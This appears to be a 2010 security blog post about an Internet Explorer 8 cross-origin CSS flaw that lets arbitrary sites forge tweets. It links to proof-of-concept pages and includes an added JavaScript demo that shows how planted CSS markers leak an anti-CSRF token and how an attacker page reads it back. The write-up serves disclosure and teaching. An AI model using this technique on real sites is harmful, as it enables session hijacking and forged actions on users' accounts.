Sep 03 2010

Internet Explorer 8 | Arbitrary Sites allowed to tweet

A new vulnerability and Proof Of Concept (PoC) code has been posted to the Full Disclosure mailing list. Chris Evans says:

A nasty vulnerability exists in the latest Internet Explorer 8. I have been unsuccessful in persuading the vendor to issue a fix. The bug permits — for example — an arbitrary web site to force the victim to make tweets.

A harmless example has also been posted on his site (see below):

http://scary.beasts.org/misc/twitter.html

This bug appears to be strictly an Internet Explorer issue and no fault of Twitter's. At this time there does not appear to be a reasonable workaround. It is a cross-origin CSS attack: the attacker's page imports a page from the victim site as a style sheet, the browser sends the user's cookies along with that request, and the lenient CSS parser lets the attacker's script read confidential text (such as anti-CSRF tokens) out of the response, which is enough to forge requests on the user's existing authenticated session.
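To make the mechanism concrete, here is an added example (not code from this post and not Chris Evans' PoC) that models the cross-origin CSS theft in plain JavaScript runnable under Node. The markers, the `authenticity_token` field, the token value, the victim HTML and the `victim.example` URL are all constructed for the demo; the toy parser reproduces the one CSS rule that matters here, that a quoted string ends at the closing quote or at an unescaped newline.

```javascript
// Added example, not code from the original post or from Chris Evans' PoC.
// It models the cross-origin CSS theft the post describes:
//   1. The attacker gets two strings of their choosing onto a page of the
//      victim site that the logged-in user can load (e.g. two messages).
//   2. The attacker's page loads that victim page as a style sheet. The
//      browser attaches the user's cookies, gets HTML back, and a lenient
//      CSS parser skips to the first marker and treats everything up to the
//      closing marker as the value of a CSS property.
//   3. Script on the attacker's page reads that property value back and
//      pulls the secret out of it (here a hypothetical anti-CSRF token).
// The markers, field name, token value and HTML below are all constructed.

const OPEN_MARKER = "{}body{font-family:'"; // planted before the secret
const CLOSE_MARKER = "';}";                 // planted after the secret

// Constructed victim page. The secret sits on the same line as the opening
// marker: an unescaped newline ends a CSS string, so only text up to the
// first newline after the marker can leak.
const VICTIM_HTML =
  '<html><body>\n' +
  '<div class="msg">' + OPEN_MARKER + '</div>' +
  '<form action="/post"><input type="hidden" name="authenticity_token" value="d3adb33f1234"></form>' +
  '<div class="msg">' + CLOSE_MARKER + '</div>\n' +
  '</body></html>';

// Toy model of a lenient CSS parser fed a non-CSS document: find the planted
// marker, then read a single-quoted string the way CSS does, stopping at the
// closing quote or giving up at an unescaped newline (a "bad string").
function leakedPropertyValue(doc) {
  const start = doc.indexOf(OPEN_MARKER);
  if (start < 0) return null;
  const valueStart = start + OPEN_MARKER.length;
  for (let i = valueStart; i < doc.length; i++) {
    const ch = doc[i];
    if (ch === '\\') { i++; continue; }          // escaped character, skip it
    if (ch === '\n' || ch === '\r') return null;  // unterminated string
    if (ch === "'") return doc.slice(valueStart, i);
  }
  return null;
}

// What the attacker's script does with the recovered value: carve the
// hypothetical anti-CSRF token out of the leaked markup.
function extractToken(leaked) {
  if (leaked === null) return null;
  const m = /name="authenticity_token" value="([^"]+)"/.exec(leaked);
  return m ? m[1] : null;
}

function stealToken(victimHtml) {
  return extractToken(leakedPropertyValue(victimHtml));
}

// The attacker-side page: loads the victim page as a style sheet and reads
// the property back. currentStyle is the IE object model; getComputedStyle
// covers the other engines.
function buildAttackerPage(victimUrl) {
  return [
    '<html><head>',
    '<link rel="stylesheet" href="' + victimUrl + '">',
    '</head><body>',
    '<script>',
    'var s = document.body.currentStyle',
    '  ? document.body.currentStyle.fontFamily',
    '  : getComputedStyle(document.body).fontFamily;',
    '// s now holds the victim page text between the two markers',
    '</script>',
    '</body></html>',
  ].join('\n');
}

// Counter-example: the same page with a line break right after the marker.
const VICTIM_HTML_WITH_NEWLINE =
  VICTIM_HTML.replace(OPEN_MARKER, OPEN_MARKER + '\n');

console.log(stealToken(VICTIM_HTML));               // d3adb33f1234
console.log(stealToken(VICTIM_HTML_WITH_NEWLINE));  // null
console.log(buildAttackerPage('https://victim.example/inbox'));
```

The newline case is the practical constraint on the attack: the two planted strings have to bracket the secret without a line break between the opening marker and the secret. The other major browsers had closed this class of bug by refusing to apply a cross-origin style sheet that is neither served as text/css nor well-formed CSS; the post's point is that IE8 still applied it.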

Chris also states that there is evidence Microsoft has been aware of this since at least 2008.

Update: another PoC has been posted:

http://skeptikal.org/exploits/twitter/twitter_xss.html


How long do we have to wait for a fix?

You can limit your exposure with client-side protections that block cross-site requests, such as NoScript or RequestPolicy. Note that both are Firefox add-ons and do not run in Internet Explorer, which is the browser actually affected here.


About Dinesh Mistry

I am a full time Security Professional, Ethical Hacker, and overall technology enthusiast. I also enjoy working on Search Engine Optimization as time permits.

Comments

  1. J says:

    Very interesting article, yay for session-hijacking.

Trackbacks

  1. [...] This post was mentioned on Twitter by Kelly Mistry, Dinesh Mistry. Dinesh Mistry said: New Post: Internet Explorer 8 | Arbitrary Sites allowed to tweet http://bit.ly/9tydR7 [...]
